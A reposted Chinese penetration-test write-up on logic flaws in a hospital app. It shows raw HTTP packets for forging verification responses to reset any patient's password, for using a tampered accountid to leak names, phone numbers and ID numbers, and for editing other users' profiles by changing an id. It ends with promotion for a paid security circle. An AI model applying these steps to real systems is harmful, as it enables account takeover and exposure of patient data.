记某医院APP的一次逻辑漏洞挖掘

admin 2025年5月5日19:36:28评论1 views字数 2185阅读7分17秒阅读模式
记某医院APP的一次逻辑漏洞挖掘

扫码加内部知识圈

获取漏洞资料

在某次渗透测试中,对某医院的APP进行抓包测试,主要挖掘了一些逻辑漏洞,记录下:
抓包APP请求的网站地址,复制到网页中打开

通过“找回密码”时由于只会验证返回包内容,可以抓包将返回包替换,成功重置了任意用户的密码,这会对系统正常用户的业务处理造成影响

访问风险地址,输入重置的密码,手机号、证件号,然后首先是短信验证

记某医院APP的一次逻辑漏洞挖掘

正确的返回包应该如下:

记某医院APP的一次逻辑漏洞挖掘

修改mobile为系统中存在的手机号(通过信息手机获得的已经注册的病人手机号),抓取返回包替换成下面的数据包,绕过前端验证成功进入下一步验证身份证

HTTP/1.1 200 OKServerApache-Coyote/1.1Access-Control-Allow-Originhttp://xxxxAccess-Control-Allow-HeadersOrigin, x-requested-withContent-TypeAccept,X-CookieAccess-Control-Allow-CredentialstrueAccess-Control-Allow-MethodsGET,POST,PUT,OPTIONS,DELETEContent-Type: application/json;charset=UTF-8DateSat22 Jan 2022 13:01:24 GMTConnection: closeContent-Length125{"msg":"验证码正确","code":1,"data":{"mobile":"xxxx","sign":"1ab261dcb1d4993abf7700e2bdbf583f","hascard":"true"}}

身份证正确的返回包应该如下,同理抓取其他地方的成功返回包直接替换

记某医院APP的一次逻辑漏洞挖掘

绕过前端对证件号的验证判断,进入最后一步修改个人信息。发包,最后返回信息修改成功。此时对应手机号的密码被成功重置

记某医院APP的一次逻辑漏洞挖掘

测试在APP和网页端都能使用重置的密码成功登陆,重置对应手机账号的密码为Aa123456

记某医院APP的一次逻辑漏洞挖掘

此外在APP的投诉举报处,通过修改accountid,可以以他人的账号身份进行投诉举报

通过注册登录APP,对投诉举报的提交进行抓包

记某医院APP的一次逻辑漏洞挖掘

数据包如下:

POST /api/authex/hpass/cloudClinic/saveComplain?t=1 HTTP/1.1Host: xxxxContent-Length187Pragma: no-cacheCache-Control: no-cacheAccept: application/json, text/javascript, */*; q=0.01X-Requested-WithXMLHttpRequestUser-AgentMozilla/5.0 (Linux; Android 6.0.1; MuMu Build/V417IR; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Mobile Safari/537.36Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,en-US;q=0.9Connection: close{"accountid":"149773","demandTypeCode":"1","complaintedPsnName":"1","issueOccurDatetime":"2022-01-22 01:04","complaintTypeCode":"0","complaintTitle":"1","complaintText":"1","address":"1"}

修改accountid,可以以他人账号id进行投诉

此时返回结果中会返回账号的手机号、姓名、身份证号码的敏感信息

记某医院APP的一次逻辑漏洞挖掘
记某医院APP的一次逻辑漏洞挖掘
此外还存在横向越权
登陆注册一个账号,在修改信息时修改id值就可对不同用户进行信息修改
数据包如下,指定id为其他账号的id,发包之后显示修改成功
记某医院APP的一次逻辑漏洞挖掘
记某医院APP的一次逻辑漏洞挖掘

修改成功后,再点击查看完善个人信息,可以看到另外一个账号的信息被修改成功,如下:

记某医院APP的一次逻辑漏洞挖掘
验证逻辑漏洞存在
记某医院APP的一次逻辑漏洞挖掘

内部圈子介绍

我们是C4安全团队,师傅们别忘了关注点赞,团队的成长离不开你们,感谢师傅们,Ciallo~(∠・ω< )⌒★~
记某医院APP的一次逻辑漏洞挖掘
圈子专注于更新SRC挖掘/代码审计相关
记某医院APP的一次逻辑漏洞挖掘

内部圈子专栏介绍

Freebuf知识大陆内部共享资料截屏详情如下

(每周保持更新)

记某医院APP的一次逻辑漏洞挖掘

知识大陆——安全渗透感知大家族

圈子券后现价 ¥39.9元

如果你有兴趣加入,抓住机会不要犹豫,价格只会上涨,不会下跌

圈子人数大于400人 69.9元/年

圈子人数大于600人 119.9元/年

(新人优惠券折扣20,扫码或者私信开头二维码即可领取更多优惠)

记某医院APP的一次逻辑漏洞挖掘
内部圈子——友反馈--价格优惠,内容优质
记某医院APP的一次逻辑漏洞挖掘
记某医院APP的一次逻辑漏洞挖掘
漏洞源码圈子如下-价格固定为39.9
记某医院APP的一次逻辑漏洞挖掘
团队公开交流群
QQ群和微信群都已建立,方便常用QQ或微信的师傅加入团队公开交流群,交流各类网安、实战方面的问题~
(微信群①群已满200人,需要邀请加开头运营二维码才能加入,②群如下)
记某医院APP的一次逻辑漏洞挖掘

原文始发于微信公众号(C4安全团队):记某医院APP的一次逻辑漏洞挖掘

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月5日19:36:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记某医院APP的一次逻辑漏洞挖掘https://cn-sec.com/archives/4030097.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息